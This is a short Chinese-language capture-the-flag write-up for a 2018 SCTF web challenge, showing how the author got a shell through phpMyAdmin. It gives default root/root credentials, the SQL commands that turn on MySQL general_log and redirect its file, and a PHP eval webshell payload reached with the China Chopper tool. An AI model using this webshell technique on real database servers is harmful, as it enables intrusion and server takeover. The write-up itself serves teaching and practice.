http://218.245.4.98:20000/phpmyadmin:2018SCTF--easiest web - phpmyadmin
SCTF的web最简单题,好难好难好难。
直接进去就是PHPmyadmin界面(即mysql的网页界面),需要登录密码,这个我当时没有破解出来,谁知道账号密码是root/root咩,要是当时账号密码同时破,或许就很好了。
进入后,可见,,,,,,,啊啊啊,登不进去了,是的,有人改密码,继续。进入后,就看见了一句话木马,参赛选手做了这项操作。一般数据库方面的就是使一句话木马存在于某个文件中,然后用中国菜刀连接即可登录服务器,寻找各种秘密信息,这就是phpmyadmin的getshell方法。本题就是这样。如下图所示
那首先,要想办法找出存储这些信息的数据文件。关键是general_log,它会启动跟踪SQL的执行记录的开关,emmmmmm
1.设置general_log
查找此字段,语句为:
show variables like 'general_log';
如果它是关闭的,如下图
启动它即可,命令为:
set global general_log=on;
查看结果(show VARIABLES like 'general_log';)如下。
启动之后,就可以愉快地设置它的记录文件了,这里用到关键词general_log_file。
2.设置general_log_file
此字段设置执行语句记录的输出文件。查看一下子它现在的文件指向。
show variables like 'general_log_file';
OK,随便输入包含一句话木马的执行语句。
select '<?php @eval($_POST[wz]) ?>';
用中国菜刀连接即可,在C盘看到flag.txt,打开即愉快地结束-。-
Yestoday is history, tomorrow is a mystery, but today is a gift.That is why it's called "present". --《Kung Fu Panda》